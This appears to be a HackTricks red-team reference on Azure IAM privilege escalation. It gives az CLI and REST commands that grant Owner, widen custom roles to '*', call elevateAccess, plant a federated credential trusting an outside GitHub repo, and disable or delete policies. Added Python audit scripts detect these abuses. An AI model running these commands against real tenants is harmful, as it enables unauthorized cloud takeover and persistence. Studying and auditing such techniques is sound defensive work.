Az - Azure IAM Privesc (Authorization)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure IAM

For more information check:

Az - Entra ID (AzureAD) & Azure IAM

Permissions that allow a principal to change its own authorization are usually privesc primitives. They are especially dangerous when granted at management group or subscription scope, because those permissions are inherited by every child resource.

Microsoft.Authorization/roleAssignments/write

This permission allows creating role assignments over a given scope, letting an attacker escalate privileges by granting themselves, or another principal they control, a more privileged role.

Typical flow:

# Login and confirm current context
az login
az account show

# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"

If the compromised principal has this action over a scope, it can directly grant a privileged role such as Owner, Contributor, Key Vault Secrets Officer, or any other built-in/custom role available in that scope:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Knowing the object ID of the target user/service principal/managed identity is enough to grant the new role. This can be used for self-privesc, lateral movement, or persistence by assigning the role to a different principal you control.

Microsoft.Authorization/roleDefinitions/write

This permission allows creating or modifying custom role definitions. In practice this is dangerous because an attacker can:

  • Modify a custom role that is already assigned to the compromised principal, so the new permissions become effective immediately.
  • Create a new over-privileged custom role and then assign it, usually by chaining with Microsoft.Authorization/roleAssignments/write.

Typical flow:

# Find the current assignments
az role assignment list --all --output table

# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"

Then write the modified definition to role.json, for example:

{
  "roleName": "<name of the role>",
  "Name": "<name of the role>",
  "IsCustom": true,
  "Description": "Custom role with elevated privileges",
  "Actions": ["*"],
  "NotActions": [],
  "DataActions": ["*"],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/<subscription-id>"],
  "id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

Then update the permissions of the existing role definition by running:

az role definition update --role-definition role.json

If the modified role is already assigned to the attacker, this can be faster than creating a new role assignment, because the permission inflation applies to the existing assignment.
If the attacker only has roleDefinitions/write, it can still be weaponized by modifying roles that are already assigned to compromised principals.
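Both of the actions above (roleAssignments/write and roleDefinitions/write) hide easily behind wildcards such as "Microsoft.Authorization/*/write" in a custom role. The following added audit script is not code from HackTricks or Microsoft; it consumes the JSON that `az role definition list -o json` and `az role assignment list --all -o json` emit, expands Azure RBAC wildcards (where "*" matches any run of characters, "/" included), subtracts NotActions, and reports which principals hold authorization-changing actions and at which scope level. The role names, GUIDs and assignments in the block are constructed sample data.

```python
"""Audit Azure RBAC exports for authorization-changing actions.

Added example, not code from HackTricks or Microsoft. Pass the two JSON
files from `az role definition list -o json` and
`az role assignment list --all -o json` as arguments; without arguments it
runs against the constructed sample records below.
"""
import json
import re
import sys

# Actions that let a principal change authorization or policy boundaries.
SENSITIVE_ACTIONS = [
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
    "Microsoft.Authorization/policyAssignments/write",
    "Microsoft.Authorization/policyAssignments/delete",
    "Microsoft.Authorization/policyDefinitions/write",
    "Microsoft.Management/managementGroups/write",
    "Microsoft.Management/managementGroups/subscriptions/write",
    "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write",
]


def action_matches(pattern: str, action: str) -> bool:
    """Azure RBAC wildcard semantics: '*' matches any run of characters, '/' included."""
    regex = "^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$"
    return re.match(regex, action, re.IGNORECASE) is not None


def effective_sensitive_actions(role_def: dict) -> list:
    """Sensitive actions a role grants once its NotActions are subtracted."""
    granted = set()
    for perm in role_def.get("permissions", []):
        allowed = perm.get("actions", [])
        denied = perm.get("notActions", [])
        for action in SENSITIVE_ACTIONS:
            if any(action_matches(p, action) for p in allowed) and not any(
                action_matches(p, action) for p in denied
            ):
                granted.add(action)
    return [a for a in SENSITIVE_ACTIONS if a in granted]


def scope_level(scope: str) -> str:
    """Classify an assignment scope; higher levels are inherited by more resources."""
    s = scope.lower()
    if s == "/":
        return "tenant"
    if "/providers/microsoft.management/managementgroups/" in s:
        return "managementGroup"
    if "/resourcegroups/" in s:
        return "resource" if "/providers/" in s.split("/resourcegroups/", 1)[1] else "resourceGroup"
    if s.startswith("/subscriptions/"):
        return "subscription"
    return "unknown"


def find_risky_assignments(role_defs: list, assignments: list) -> list:
    """Join assignments to their role definitions and report sensitive grants."""
    by_name = {rd["roleName"]: rd for rd in role_defs}
    findings = []
    for a in assignments:
        rd = by_name.get(a.get("roleDefinitionName"))
        if rd is None:
            continue
        actions = effective_sensitive_actions(rd)
        if actions:
            findings.append({
                "principalId": a["principalId"],
                "principalType": a.get("principalType", "unknown"),
                "role": rd["roleName"],
                "scope": a["scope"],
                "scopeLevel": scope_level(a["scope"]),
                "sensitiveActions": actions,
            })
    return findings


# Constructed sample data: the GUIDs, role names and scopes are placeholders.
SUB = "/subscriptions/11111111-1111-1111-1111-111111111111"
SAMPLE_ROLE_DEFS = [
    {"roleName": "Owner", "roleType": "BuiltInRole",
     "permissions": [{"actions": ["*"], "notActions": []}]},
    {"roleName": "AppDeployer", "roleType": "CustomRole",
     "permissions": [{"actions": ["Microsoft.Web/*", "Microsoft.Authorization/*/write"],
                      "notActions": ["Microsoft.Authorization/roleDefinitions/write"]}]},
    {"roleName": "ReadOnly", "roleType": "CustomRole",
     "permissions": [{"actions": ["*/read"], "notActions": []}]},
]
SAMPLE_ASSIGNMENTS = [
    {"principalId": "aaaaaaaa-0000-0000-0000-000000000001", "principalType": "ServicePrincipal",
     "roleDefinitionName": "AppDeployer", "scope": SUB},
    {"principalId": "aaaaaaaa-0000-0000-0000-000000000002", "principalType": "User",
     "roleDefinitionName": "ReadOnly", "scope": SUB + "/resourceGroups/Resource_Group_1"},
]

if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f1, open(sys.argv[2]) as f2:
            defs, assigns = json.load(f1), json.load(f2)
    else:
        defs, assigns = SAMPLE_ROLE_DEFS, SAMPLE_ASSIGNMENTS
    print(json.dumps(find_risky_assignments(defs, assigns), indent=2))
```

With the sample data the "AppDeployer" role is reported at subscription scope with roleAssignments/write, policyAssignments/write and policyDefinitions/write, even though none of those strings appears literally in the definition; the NotActions entry correctly removes roleDefinitions/write. Run it periodically against fresh exports and alert on any finding whose scopeLevel is tenant, managementGroup or subscription.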

Microsoft.Authorization/elevateAccess/action

This permission allows elevating privileges so that the caller can assign permissions to any principal on Azure resources. It is intended for Entra ID Global Administrators so they can also manage permissions on Azure resources.

Tip

I think the user needs to be a Global Administrator in Entra ID for the elevate call to work.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<object-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

This permission allows creating/updating Federated Identity Credentials (FICs) on user-assigned managed identities. In practice, it lets an attacker add a new trust relationship to an external identity provider and then obtain tokens as that managed identity.

This is a persistence / identity hijacking primitive: if the managed identity already has access to Azure resources, the attacker only needs to create the matching external workload (for example, a GitHub Actions workflow) and exchange the external token for Azure tokens.

Key things to verify before abusing it:

  • Which managed identity can be modified
  • Which scopes/roles are already assigned to that managed identity
  • Which issuer, subject, and audience will be accepted during the token exchange

You can create a FIC with the dedicated CLI command:

az identity federated-credential create \
--name "github-federated-identity" \
--identity-name testMI \
--resource-group bialystok-rg \
--issuer "https://token.actions.githubusercontent.com" \
--subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
--audiences "api://AzureADTokenExchange"

Or with raw REST.

Example command granting a GitHub repo access to a managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Once the FIC is created, the attacker can authenticate from the external workload and use the permissions the managed identity already holds in Azure. For more information about abusing GitHub OIDC / workload identity, check:

Az Federation Abuse
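The three checks listed above (which identity, which roles, which issuer/subject/audience) are exactly what a defender should re-verify for every existing FIC. The following added script is not code from HackTricks, GitHub or Microsoft; it consumes the JSON returned by `az identity federated-credential list --identity-name <mi> --resource-group <rg> -o json`, parses GitHub subjects of the form repo:ORG/REPO:ref:refs/heads/BRANCH, and flags credentials whose issuer, repo owner, ref or audience falls outside an allowlist you supply. The allowlist values and credential records in the block are constructed samples.

```python
"""Audit federated identity credentials on a user-assigned managed identity.

Added example, not code from HackTricks, GitHub or Microsoft. It reads
the JSON from `az identity federated-credential list ... -o json` (pass the
file as the first argument) or falls back to constructed sample records.
"""
import json
import sys

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"
EXPECTED_AUDIENCE = "api://AzureADTokenExchange"

# Constructed allowlist: adjust to the issuers, GitHub orgs and branches you trust.
ALLOWED_ISSUERS = {GITHUB_ISSUER}
ALLOWED_OWNERS = {"contoso-org"}
ALLOWED_REFS = {"refs/heads/main"}


def parse_github_subject(subject: str):
    """Split 'repo:ORG/REPO:<claim>[:<value>]' into parts; None if it is not that shape."""
    parts = subject.split(":", 3)
    if len(parts) < 3 or parts[0] != "repo" or "/" not in parts[1]:
        return None
    owner, repo = parts[1].split("/", 1)
    value = parts[3] if len(parts) == 4 else ""
    return {"owner": owner, "repo": repo, "claim": parts[2], "value": value}


def audit_credential(cred: dict, allowed_issuers: set, allowed_owners: set, allowed_refs: set) -> list:
    """Return the reasons a credential deserves review; an empty list means it passes."""
    reasons = []
    issuer = cred.get("issuer", "")
    if issuer not in allowed_issuers:
        reasons.append(f"issuer not allowlisted: {issuer}")
    audiences = cred.get("audiences", [])
    if audiences != [EXPECTED_AUDIENCE]:
        reasons.append(f"unexpected audiences: {audiences}")
    if issuer == GITHUB_ISSUER:
        sub = parse_github_subject(cred.get("subject", ""))
        if sub is None:
            reasons.append(f"unparsable GitHub subject: {cred.get('subject')}")
        else:
            if sub["owner"] not in allowed_owners:
                reasons.append(f"repo owner outside allowlist: {sub['owner']}")
            if sub["claim"] == "ref" and sub["value"] not in allowed_refs:
                reasons.append(f"ref not allowlisted: {sub['value']}")
            elif sub["claim"] != "ref":
                # environment / pull_request subjects widen who can mint the token; review them.
                reasons.append(f"non-ref subject claim '{sub['claim']}' needs review")
    return reasons


def audit_all(creds: list, allowed_issuers: set, allowed_owners: set, allowed_refs: set) -> dict:
    """Map credential name -> list of review reasons."""
    return {c["name"]: audit_credential(c, allowed_issuers, allowed_owners, allowed_refs) for c in creds}


# Constructed sample credentials (names reuse the page's placeholders; owners are invented).
SAMPLE_CREDENTIALS = [
    {"name": "github-federated-identity", "issuer": GITHUB_ISSUER,
     "subject": "repo:contoso-org/deploy:ref:refs/heads/main", "audiences": [EXPECTED_AUDIENCE]},
    {"name": "CustomGH2", "issuer": GITHUB_ISSUER,
     "subject": "repo:unknown-user/azure_func4:ref:refs/heads/main", "audiences": [EXPECTED_AUDIENCE]},
    {"name": "pr-builds", "issuer": GITHUB_ISSUER,
     "subject": "repo:contoso-org/deploy:pull_request", "audiences": [EXPECTED_AUDIENCE]},
    {"name": "legacy-idp", "issuer": "https://idp.example.invalid",
     "subject": "system:serviceaccount:prod:deployer", "audiences": [EXPECTED_AUDIENCE]},
]

if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1]) as f:
            creds = json.load(f)
    else:
        creds = SAMPLE_CREDENTIALS
    for name, reasons in audit_all(creds, ALLOWED_ISSUERS, ALLOWED_OWNERS, ALLOWED_REFS).items():
        print(name, "OK" if not reasons else "; ".join(reasons))
```

Only the first sample passes; "CustomGH2" is flagged because the repo owner is not in the allowlist, which is the pattern a roleAssignments-style abuse of federatedIdentityCredentials/write leaves behind: a new credential pointing at a repository the organisation does not control. Pair the script with an Activity Log alert on the write operation itself so new credentials are reviewed as they appear.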

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

An attacker with the Microsoft.Authorization/policyAssignments/write or Microsoft.Authorization/policyAssignments/delete permission over a management group, subscription, or resource group can modify or delete Azure Policy assignments, potentially disabling security restrictions that block certain operations.

This allows access to resources or functionality that was previously protected by policy.

Delete a policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Disable a policy assignment:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

Verify the changes:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

An attacker with the Microsoft.Authorization/policyDefinitions/write permission can modify Azure Policy definitions, changing the rules that enforce security restrictions across the whole environment.

For example, a policy that restricts the regions in which resources may be created can be modified to allow any region, or the policy's effect can be changed so that it is no longer enforced.

Modify a policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Verify the changes:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"
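The two policy sections above describe three changes a defender wants to catch: an assignment deleted, an assignment switched to enforcement mode Disabled (DoNotEnforce in the JSON), and a definition whose effect or condition was loosened. The following added script is not code from HackTricks or Microsoft; it reads the JSON from `az policy assignment list -o json` and the policyRule object from `az policy definition show -o json`, compares them with a trusted baseline kept in source control, and reports the drift. The assignment names, scope and rules in the block are constructed samples.

```python
"""Detect weakened Azure Policy enforcement from CLI exports.

Added example, not code from HackTricks or Microsoft. Assignments come from
`az policy assignment list -o json`; rules are the `policyRule` object from
`az policy definition show -o json`. All records below are constructed.
"""
import json

# Effects ordered strongest to weakest; anything else is reported as a plain change.
EFFECT_STRENGTH = {"deny": 3, "audit": 2, "disabled": 1}


def find_unenforced_assignments(assignments: list) -> list:
    """Names of assignments whose enforcementMode is not Default (i.e. DoNotEnforce)."""
    return [a["name"] for a in assignments if a.get("enforcementMode", "Default") != "Default"]


def missing_assignments(baseline_names: set, assignments: list) -> list:
    """Expected assignments that no longer exist at the audited scope."""
    present = {a["name"] for a in assignments}
    return sorted(baseline_names - present)


def compare_policy_rules(baseline: dict, current: dict) -> list:
    """Describe how a policy rule drifted from its baseline copy."""
    changes = []
    old_effect = str(baseline.get("then", {}).get("effect", "")).lower()
    new_effect = str(current.get("then", {}).get("effect", "")).lower()
    if old_effect != new_effect:
        old_rank = EFFECT_STRENGTH.get(old_effect)
        new_rank = EFFECT_STRENGTH.get(new_effect)
        if old_rank is not None and new_rank is not None and new_rank < old_rank:
            changes.append(f"effect weakened: {old_effect} -> {new_effect}")
        else:
            changes.append(f"effect changed: {old_effect} -> {new_effect}")
    # A loosened 'if' block (e.g. an extra allowed location) is also a weakening.
    old_if = json.dumps(baseline.get("if"), sort_keys=True)
    new_if = json.dumps(current.get("if"), sort_keys=True)
    if old_if != new_if:
        changes.append("condition changed: " + new_if)
    return changes


def policy_drift_report(baseline_names: set, assignments: list, baseline_rule: dict, current_rule: dict) -> dict:
    """Combine the three checks into one report."""
    return {
        "unenforced": find_unenforced_assignments(assignments),
        "missing": missing_assignments(baseline_names, assignments),
        "rule_changes": compare_policy_rules(baseline_rule, current_rule),
    }


# Constructed sample data: management group name, assignment names and rules are invented.
MG = "/providers/Microsoft.Management/managementGroups/landing-zone"
SAMPLE_ASSIGNMENTS = [
    {"name": "allowed-locations", "enforcementMode": "Default", "scope": MG},
    {"name": "deny-public-ip", "enforcementMode": "DoNotEnforce", "scope": MG},
]
BASELINE_NAMES = {"allowed-locations", "deny-public-ip", "require-tags"}
BASELINE_RULE = {
    "if": {"not": {"field": "location", "in": ["eastus", "westeurope"]}},
    "then": {"effect": "Deny"},
}
MODIFIED_RULE = {
    "if": {"not": {"field": "location", "in": ["eastus", "westeurope", "southeastasia"]}},
    "then": {"effect": "Audit"},
}

if __name__ == "__main__":
    report = policy_drift_report(BASELINE_NAMES, SAMPLE_ASSIGNMENTS, BASELINE_RULE, MODIFIED_RULE)
    print(json.dumps(report, indent=2))
```

On the sample data the report shows "deny-public-ip" running unenforced, "require-tags" deleted, and the allowed-locations rule both weakened from Deny to Audit and extended with an extra region. Since policy definitions are evaluated across the whole hierarchy, any non-empty rule_changes entry for a management-group-level definition deserves the same priority as a role assignment change.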

Microsoft.Management/managementGroups/write

An attacker with the Microsoft.Management/managementGroups/write permission can modify the management group hierarchy or create new management groups, which can help bypass restrictive policies applied at higher levels.

For example, the attacker can create a new management group without restrictive policies and then move subscriptions into it.

Create a new management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Change the management group hierarchy:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Verify the changes:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

An attacker with the Microsoft.Management/managementGroups/subscriptions/write permission can move subscriptions between management groups, potentially bypassing restrictive policies by moving the subscription into a group with less strict policies or no policies at all.

Move a subscription to a different management group:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Verify the changes:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"
